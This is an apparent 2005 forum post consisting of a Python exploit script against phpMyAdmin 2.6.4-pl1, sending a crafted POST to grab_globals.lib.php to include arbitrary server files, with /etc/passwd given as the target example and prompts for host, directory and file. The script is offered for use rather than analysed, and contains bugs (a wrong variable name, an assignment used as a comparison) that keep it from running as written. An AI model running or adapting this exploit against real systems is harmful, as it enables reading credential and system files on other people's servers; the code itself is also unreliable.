[ BigBrother2005 @ 19.10.2005. 10:21 ] @
Code: import httplib # phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit # modified by Crn1vuk5 and translated to Python #this file could be used as import script print "\r\n SecurityReason TEAM\r\n"; print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n"; print " \r\n"; print "modified by Crn1vuk5 and translated to Python" print " \r\n"; print "HOST - Host where is phpmyadmin example: http://localhost\r\n"; print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n"; print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n"; def phpMyAdminexploit(Host,Dir,File): h=httplib.HTTPConnection(Host) dirx=str(Dir)+"libraries/grab_globals.lib.php" filex="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]="+str(file)+"&subform[1][cXIb8O3]=1" length=len(filex) h.putrequest('POST',dirx,'HTTP/1.0') print "Sending Exploit to target",Host,dirx,filex h.putheader('Host',Host) h.putheader('Accept','text/plain;q=0.8,image/png,*/*;q=0.5') h.putheader('Accept-Language',' en-us,en;q=0.5') h.putheader('Content-Type', 'application/x-www-form-urlencoded') h.putheader('Content-Length',length) h.endheaders() h.send(filex) r1 = h.getresponse() if r1.status="200 OK": print "exploit sent" else: print "expolit failed" host_=raw_input("Enter the name of the Host : ") dir_=raw_input("Enter the name of the Directory:") file_=raw_input("File to inclusion:") phpMyAdminexploit(host_,dir_,file_) [Ovu poruku je menjao BigBrother2005 dana 19.10.2005. u 14:50 GMT+1] |